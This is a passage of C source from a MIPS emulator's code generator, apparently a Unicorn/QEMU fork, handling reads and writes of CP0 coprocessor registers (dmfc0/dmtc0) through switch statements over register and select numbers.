arg, offsetof(CPUMIPSState, CP0_Wired)); //register_name = "Wired"; break; case CP0_REG06__SRSCONF0: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf0)); //register_name = "SRSConf0"; break; case CP0_REG06__SRSCONF1: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf1)); //register_name = "SRSConf1"; break; case CP0_REG06__SRSCONF2: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf2)); //register_name = "SRSConf2"; break; case CP0_REG06__SRSCONF3: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf3)); //register_name = "SRSConf3"; break; case CP0_REG06__SRSCONF4: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSConf4)); //register_name = "SRSConf4"; break; case CP0_REG06__PWCTL: check_pw(ctx); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PWCtl)); //register_name = "PWCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_07: switch (sel) { case CP0_REG07__HWRENA: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_HWREna)); //register_name = "HWREna"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_08: switch (sel) { case CP0_REG08__BADVADDR: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_BadVAddr)); //register_name = "BadVAddr"; break; case CP0_REG08__BADINSTR: CP0_CHECK(ctx->bi); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_BadInstr)); //register_name = "BadInstr"; break; case CP0_REG08__BADINSTRP: CP0_CHECK(ctx->bp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_BadInstrP)); //register_name = "BadInstrP"; break; case CP0_REG08__BADINSTRX: CP0_CHECK(ctx->bi); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_BadInstrX)); tcg_gen_andi_tl(tcg_ctx, arg, arg, ~0xffff); //register_name = "BadInstrX"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_09: switch (sel) { case CP0_REG09__COUNT: /* Mark as an IO operation because we read the time. */ if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_mfc0_count(tcg_ctx, arg, tcg_ctx->cpu_env); /* * Break the TB to be able to take timer interrupts immediately * after reading count. DISAS_STOP isn't sufficient, we need to * ensure we break completely out of translated code. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Count"; break; case CP0_REG09__SAARI: CP0_CHECK(ctx->saar); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SAARI)); //register_name = "SAARI"; break; case CP0_REG09__SAAR: CP0_CHECK(ctx->saar); gen_helper_dmfc0_saar(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "SAAR"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_10: switch (sel) { case CP0_REG10__ENTRYHI: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EntryHi)); //register_name = "EntryHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_11: switch (sel) { case CP0_REG11__COMPARE: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Compare)); //register_name = "Compare"; break; /* 6,7 are implementation dependent */ default: goto cp0_unimplemented; } break; case CP0_REGISTER_12: switch (sel) { case CP0_REG12__STATUS: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Status)); //register_name = "Status"; break; case CP0_REG12__INTCTL: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_IntCtl)); //register_name = "IntCtl"; break; case CP0_REG12__SRSCTL: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSCtl)); //register_name = "SRSCtl"; break; case CP0_REG12__SRSMAP: check_insn(ctx, ISA_MIPS32R2); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); //register_name = "SRSMap"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_13: switch (sel) { case CP0_REG13__CAUSE: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Cause)); //register_name = "Cause"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_14: switch (sel) { case CP0_REG14__EPC: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC)); //register_name = "EPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_15: switch (sel) { case CP0_REG15__PRID: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_PRid)); //register_name = "PRid"; break; case CP0_REG15__EBASE: check_insn(ctx, ISA_MIPS32R2); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EBase)); //register_name = "EBase"; break; case CP0_REG15__CMGCRBASE: check_insn(ctx, ISA_MIPS32R2); CP0_CHECK(ctx->cmgcr); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_CMGCRBase)); //register_name = "CMGCRBase"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_16: switch (sel) { case CP0_REG16__CONFIG: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config0)); //register_name = "Config"; break; case CP0_REG16__CONFIG1: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config1)); //register_name = "Config1"; break; case CP0_REG16__CONFIG2: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config2)); //register_name = "Config2"; break; case CP0_REG16__CONFIG3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config3)); //register_name = "Config3"; break; case CP0_REG16__CONFIG4: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config4)); //register_name = "Config4"; break; case CP0_REG16__CONFIG5: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config5)); //register_name = "Config5"; break; /* 6,7 are implementation dependent */ case CP0_REG16__CONFIG6: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config6)); //register_name = "Config6"; break; case CP0_REG16__CONFIG7: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Config7)); //register_name = "Config7"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_17: switch (sel) { case CP0_REG17__LLADDR: gen_helper_dmfc0_lladdr(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "LLAddr"; break; case CP0_REG17__MAAR: CP0_CHECK(ctx->mrp); gen_helper_dmfc0_maar(tcg_ctx, arg, tcg_ctx->cpu_env); //register_name = "MAAR"; break; case CP0_REG17__MAARI: CP0_CHECK(ctx->mrp); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_MAARI)); //register_name = "MAARI"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_18: switch (sel) { case CP0_REG18__WATCHLO0: case CP0_REG18__WATCHLO1: case CP0_REG18__WATCHLO2: case CP0_REG18__WATCHLO3: case CP0_REG18__WATCHLO4: case CP0_REG18__WATCHLO5: case CP0_REG18__WATCHLO6: case CP0_REG18__WATCHLO7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_1e0i(dmfc0_watchlo, arg, sel); //register_name = "WatchLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_19: switch (sel) { case CP0_REG19__WATCHHI0: case CP0_REG19__WATCHHI1: case CP0_REG19__WATCHHI2: case CP0_REG19__WATCHHI3: case CP0_REG19__WATCHHI4: case CP0_REG19__WATCHHI5: case CP0_REG19__WATCHHI6: case CP0_REG19__WATCHHI7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_1e0i(dmfc0_watchhi, arg, sel); //register_name = "WatchHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_20: switch (sel) { case CP0_REG20__XCONTEXT: check_insn(ctx, ISA_MIPS3); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_XContext)); //register_name = "XContext"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_21: /* Officially reserved, but sel 0 is used for R1x000 framemask */ CP0_CHECK(!(ctx->insn_flags & ISA_MIPS32R6)); switch (sel) { case 0: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Framemask)); //register_name = "Framemask"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_22: tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ //register_name = "'Diagnostic"; /* implementation dependent */ break; case CP0_REGISTER_23: switch (sel) { case CP0_REG23__DEBUG: gen_helper_mfc0_debug(tcg_ctx, arg, tcg_ctx->cpu_env); /* EJTAG support */ //register_name = "Debug"; break; case CP0_REG23__TRACECONTROL: /* PDtrace support */ /* gen_helper_dmfc0_tracecontrol(tcg_ctx, arg, tcg_ctx->cpu_env); */ //register_name = "TraceControl"; goto cp0_unimplemented; case CP0_REG23__TRACECONTROL2: /* PDtrace support */ /* gen_helper_dmfc0_tracecontrol2(tcg_ctx, arg, tcg_ctx->cpu_env); */ //register_name = "TraceControl2"; goto cp0_unimplemented; case CP0_REG23__USERTRACEDATA1: /* PDtrace support */ /* gen_helper_dmfc0_usertracedata1(tcg_ctx, arg, tcg_ctx->cpu_env);*/ //register_name = "UserTraceData1"; goto cp0_unimplemented; case CP0_REG23__TRACEIBPC: /* PDtrace support */ /* gen_helper_dmfc0_traceibpc(tcg_ctx, arg, tcg_ctx->cpu_env); */ //register_name = "TraceIBPC"; goto cp0_unimplemented; case CP0_REG23__TRACEDBPC: /* PDtrace support */ /* gen_helper_dmfc0_tracedbpc(tcg_ctx, arg, tcg_ctx->cpu_env); */ //register_name = "TraceDBPC"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_24: switch (sel) { case CP0_REG24__DEPC: /* EJTAG support */ tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_DEPC)); //register_name = "DEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_25: switch (sel) { case CP0_REG25__PERFCTL0: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_Performance0)); //register_name = "Performance0"; break; case CP0_REG25__PERFCNT0: /* gen_helper_dmfc0_performance1(tcg_ctx, arg); */ //register_name = "Performance1"; goto cp0_unimplemented; case CP0_REG25__PERFCTL1: /* gen_helper_dmfc0_performance2(tcg_ctx, arg); */ //register_name = "Performance2"; goto cp0_unimplemented; case CP0_REG25__PERFCNT1: /* gen_helper_dmfc0_performance3(tcg_ctx, arg); */ //register_name = "Performance3"; goto cp0_unimplemented; case CP0_REG25__PERFCTL2: /* gen_helper_dmfc0_performance4(tcg_ctx, arg); */ //register_name = "Performance4"; goto cp0_unimplemented; case CP0_REG25__PERFCNT2: /* gen_helper_dmfc0_performance5(tcg_ctx, arg); */ //register_name = "Performance5"; goto cp0_unimplemented; case CP0_REG25__PERFCTL3: /* gen_helper_dmfc0_performance6(tcg_ctx, arg); */ //register_name = "Performance6"; goto cp0_unimplemented; case CP0_REG25__PERFCNT3: /* gen_helper_dmfc0_performance7(tcg_ctx, arg); */ //register_name = "Performance7"; goto cp0_unimplemented; default: goto cp0_unimplemented; } break; case CP0_REGISTER_26: switch (sel) { case CP0_REG26__ERRCTL: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_ErrCtl)); //register_name = "ErrCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_27: switch (sel) { /* ignored */ case CP0_REG27__CACHERR: tcg_gen_movi_tl(tcg_ctx, arg, 0); /* unimplemented */ //register_name = "CacheErr"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_28: switch (sel) { case CP0_REG28__TAGLO: case CP0_REG28__TAGLO1: case CP0_REG28__TAGLO2: case CP0_REG28__TAGLO3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_TagLo)); //register_name = "TagLo"; break; case CP0_REG28__DATALO: case CP0_REG28__DATALO1: case CP0_REG28__DATALO2: case CP0_REG28__DATALO3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DataLo)); //register_name = "DataLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_29: switch (sel) { case CP0_REG29__TAGHI: case CP0_REG29__TAGHI1: case CP0_REG29__TAGHI2: case CP0_REG29__TAGHI3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_TagHi)); //register_name = "TagHi"; break; case CP0_REG29__DATAHI: case CP0_REG29__DATAHI1: case CP0_REG29__DATAHI2: case CP0_REG29__DATAHI3: gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DataHi)); //register_name = "DataHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_30: switch (sel) { case CP0_REG30__ERROREPC: tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_ErrorEPC)); //register_name = "ErrorEPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_31: switch (sel) { case CP0_REG31__DESAVE: /* EJTAG support */ gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_DESAVE)); //register_name = "DESAVE"; break; case CP0_REG31__KSCRATCH1: case CP0_REG31__KSCRATCH2: case CP0_REG31__KSCRATCH3: case CP0_REG31__KSCRATCH4: case CP0_REG31__KSCRATCH5: case CP0_REG31__KSCRATCH6: CP0_CHECK(ctx->kscrexist & (1 << sel)); tcg_gen_ld_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_KScratch[sel - 2])); //register_name = "KScratch"; break; default: goto cp0_unimplemented; } break; default: goto cp0_unimplemented; } return; cp0_unimplemented: //qemu_log_mask(LOG_UNIMP, "dmfc0 %s (reg %d sel %d)\n", //register_name, reg, sel); gen_mfc0_unimplemented(ctx, arg); } static void gen_dmtc0(DisasContext *ctx, TCGv arg, int reg, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; //const char *register_name = "invalid"; if (sel != 0) { check_insn(ctx, ISA_MIPS64); } if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } switch (reg) { case CP0_REGISTER_00: switch (sel) { case CP0_REG00__INDEX: gen_helper_mtc0_index(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Index"; break; case CP0_REG00__MVPCONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_mvpcontrol(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MVPControl"; break; case CP0_REG00__MVPCONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); /* ignored */ //register_name = "MVPConf0"; break; case CP0_REG00__MVPCONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); /* ignored */ //register_name = "MVPConf1"; break; case CP0_REG00__VPCONTROL: CP0_CHECK(ctx->vp); /* ignored */ //register_name = "VPControl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_01: switch (sel) { case CP0_REG01__RANDOM: /* ignored */ //register_name = "Random"; break; case CP0_REG01__VPECONTROL: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpecontrol(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEControl"; break; case CP0_REG01__VPECONF0: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpeconf0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEConf0"; break; case CP0_REG01__VPECONF1: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpeconf1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEConf1"; break; case CP0_REG01__YQMASK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_yqmask(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "YQMask"; break; case CP0_REG01__VPESCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPESchedule)); //register_name = "VPESchedule"; break; case CP0_REG01__VPESCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_VPEScheFBack)); //register_name = "VPEScheFBack"; break; case CP0_REG01__VPEOPT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_vpeopt(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "VPEOpt"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_02: switch (sel) { case CP0_REG02__ENTRYLO0: gen_helper_dmtc0_entrylo0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EntryLo0"; break; case CP0_REG02__TCSTATUS: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcstatus(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCStatus"; break; case CP0_REG02__TCBIND: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcbind(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCBind"; break; case CP0_REG02__TCRESTART: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcrestart(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCRestart"; break; case CP0_REG02__TCHALT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tchalt(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCHalt"; break; case CP0_REG02__TCCONTEXT: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tccontext(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCContext"; break; case CP0_REG02__TCSCHEDULE: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcschedule(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCSchedule"; break; case CP0_REG02__TCSCHEFBACK: CP0_CHECK(ctx->insn_flags & ASE_MT); gen_helper_mtc0_tcschefback(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "TCScheFBack"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_03: switch (sel) { case CP0_REG03__ENTRYLO1: gen_helper_dmtc0_entrylo1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EntryLo1"; break; case CP0_REG03__GLOBALNUM: CP0_CHECK(ctx->vp); /* ignored */ //register_name = "GlobalNumber"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_04: switch (sel) { case CP0_REG04__CONTEXT: gen_helper_mtc0_context(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Context"; break; case CP0_REG04__CONTEXTCONFIG: /* SmartMIPS ASE */ /* gen_helper_dmtc0_contextconfig(tcg_ctx, arg); */ //register_name = "ContextConfig"; goto cp0_unimplemented; case CP0_REG04__USERLOCAL: CP0_CHECK(ctx->ulri); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); //register_name = "UserLocal"; break; case CP0_REG04__MMID: CP0_CHECK(ctx->mi); gen_mfc0_load32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_MemoryMapID)); //register_name = "MMID"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_05: switch (sel) { case CP0_REG05__PAGEMASK: gen_helper_mtc0_pagemask(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PageMask"; break; case CP0_REG05__PAGEGRAIN: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_pagegrain(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PageGrain"; break; case CP0_REG05__SEGCTL0: CP0_CHECK(ctx->sc); gen_helper_mtc0_segctl0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SegCtl0"; break; case CP0_REG05__SEGCTL1: CP0_CHECK(ctx->sc); gen_helper_mtc0_segctl1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SegCtl1"; break; case CP0_REG05__SEGCTL2: CP0_CHECK(ctx->sc); gen_helper_mtc0_segctl2(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SegCtl2"; break; case CP0_REG05__PWBASE: check_pw(ctx); tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_PWBase)); //register_name = "PWBase"; break; case CP0_REG05__PWFIELD: check_pw(ctx); gen_helper_mtc0_pwfield(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PWField"; break; case CP0_REG05__PWSIZE: check_pw(ctx); gen_helper_mtc0_pwsize(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PWSize"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_06: switch (sel) { case CP0_REG06__WIRED: gen_helper_mtc0_wired(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Wired"; break; case CP0_REG06__SRSCONF0: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf0"; break; case CP0_REG06__SRSCONF1: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf1(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf1"; break; case CP0_REG06__SRSCONF2: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf2(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf2"; break; case CP0_REG06__SRSCONF3: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf3(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf3"; break; case CP0_REG06__SRSCONF4: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsconf4(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SRSConf4"; break; case CP0_REG06__PWCTL: check_pw(ctx); gen_helper_mtc0_pwctl(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "PWCtl"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_07: switch (sel) { case CP0_REG07__HWRENA: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_hwrena(tcg_ctx, tcg_ctx->cpu_env, arg); ctx->base.is_jmp = DISAS_STOP; //register_name = "HWREna"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_08: switch (sel) { case CP0_REG08__BADVADDR: /* ignored */ //register_name = "BadVAddr"; break; case CP0_REG08__BADINSTR: /* ignored */ //register_name = "BadInstr"; break; case CP0_REG08__BADINSTRP: /* ignored */ //register_name = "BadInstrP"; break; case CP0_REG08__BADINSTRX: /* ignored */ //register_name = "BadInstrX"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_09: switch (sel) { case CP0_REG09__COUNT: gen_helper_mtc0_count(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Count"; break; case CP0_REG09__SAARI: CP0_CHECK(ctx->saar); gen_helper_mtc0_saari(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SAARI"; break; case CP0_REG09__SAAR: CP0_CHECK(ctx->saar); gen_helper_mtc0_saar(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "SAAR"; break; default: goto cp0_unimplemented; } /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REGISTER_10: switch (sel) { case CP0_REG10__ENTRYHI: gen_helper_mtc0_entryhi(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EntryHi"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_11: switch (sel) { case CP0_REG11__COMPARE: gen_helper_mtc0_compare(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Compare"; break; /* 6,7 are implementation dependent */ default: goto cp0_unimplemented; } /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REGISTER_12: switch (sel) { case CP0_REG12__STATUS: save_cpu_state(ctx, 1); gen_helper_mtc0_status(tcg_ctx, tcg_ctx->cpu_env, arg); /* DISAS_STOP isn't good enough here, hflags may have changed. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Status"; break; case CP0_REG12__INTCTL: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_intctl(tcg_ctx, tcg_ctx->cpu_env, arg); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "IntCtl"; break; case CP0_REG12__SRSCTL: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_srsctl(tcg_ctx, tcg_ctx->cpu_env, arg); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "SRSCtl"; break; case CP0_REG12__SRSMAP: check_insn(ctx, ISA_MIPS32R2); gen_mtc0_store32(tcg_ctx, arg, offsetof(CPUMIPSState, CP0_SRSMap)); /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; //register_name = "SRSMap"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_13: switch (sel) { case CP0_REG13__CAUSE: save_cpu_state(ctx, 1); gen_helper_mtc0_cause(tcg_ctx, tcg_ctx->cpu_env, arg); /* * Stop translation as we may have triggered an interrupt. * DISAS_STOP isn't sufficient, we need to ensure we break out of * translated code to check for pending interrupts. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; //register_name = "Cause"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_14: switch (sel) { case CP0_REG14__EPC: tcg_gen_st_tl(tcg_ctx, arg, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_EPC)); //register_name = "EPC"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_15: switch (sel) { case CP0_REG15__PRID: /* ignored */ //register_name = "PRid"; break; case CP0_REG15__EBASE: check_insn(ctx, ISA_MIPS32R2); gen_helper_mtc0_ebase(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "EBase"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_16: switch (sel) { case CP0_REG16__CONFIG: gen_helper_mtc0_config0(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG1: /* ignored, read only */ //register_name = "Config1"; break; case CP0_REG16__CONFIG2: gen_helper_mtc0_config2(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config2"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG3: gen_helper_mtc0_config3(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config3"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; case CP0_REG16__CONFIG4: /* currently ignored */ //register_name = "Config4"; break; case CP0_REG16__CONFIG5: gen_helper_mtc0_config5(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "Config5"; /* Stop translation as we may have switched the execution mode */ ctx->base.is_jmp = DISAS_STOP; break; /* 6,7 are implementation dependent */ default: //register_name = "Invalid config selector"; goto cp0_unimplemented; } break; case CP0_REGISTER_17: switch (sel) { case CP0_REG17__LLADDR: gen_helper_mtc0_lladdr(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "LLAddr"; break; case CP0_REG17__MAAR: CP0_CHECK(ctx->mrp); gen_helper_mtc0_maar(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MAAR"; break; case CP0_REG17__MAARI: CP0_CHECK(ctx->mrp); gen_helper_mtc0_maari(tcg_ctx, tcg_ctx->cpu_env, arg); //register_name = "MAARI"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_18: switch (sel) { case CP0_REG18__WATCHLO0: case CP0_REG18__WATCHLO1: case CP0_REG18__WATCHLO2: case CP0_REG18__WATCHLO3: case CP0_REG18__WATCHLO4: case CP0_REG18__WATCHLO5: case CP0_REG18__WATCHLO6: case CP0_REG18__WATCHLO7: CP0_CHECK(ctx->CP0_Config1 & (1 << CP0C1_WR)); gen_helper_0e1i(mtc0_watchlo, arg, sel); //register_name = "WatchLo"; break; default: goto cp0_unimplemented; } break; case CP0_REGISTER_19: switch (sel) { case CP0_REG19__WATCHHI0: case CP0_REG19__WATCHHI1: case CP0_REG19__WATCHHI2: case CP0_REG19__WATCHHI3: case CP0_REG19__WATCHHI4: case CP0_REG19__WATCHHI5: case CP0_REG19__WATCHHI6: case CP0_REG19__WATCHHI7: 